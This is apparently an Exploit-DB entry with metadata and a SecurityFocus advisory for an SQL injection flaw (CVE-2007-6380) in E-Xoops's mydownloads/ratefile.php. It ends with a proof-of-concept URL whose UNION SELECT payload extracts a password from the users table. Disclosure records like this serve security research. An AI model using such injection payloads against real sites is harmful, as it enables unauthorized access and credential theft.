E-Xoops 1.0.5/1.0.8 - '/mydownloads/ratefile.php?lid' SQL Injection

Author: Lostmon
type: webapps
platform: php
port: 
date_added: 2007-12-10  
date_updated: 2014-01-10  
verified: 1  
codes: CVE-2007-6380;OSVDB-43680  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 30863.txt  
source: https://www.securityfocus.com/bid/26796/info

E-Xoops is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/e-xoops/modules/mydownloads/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201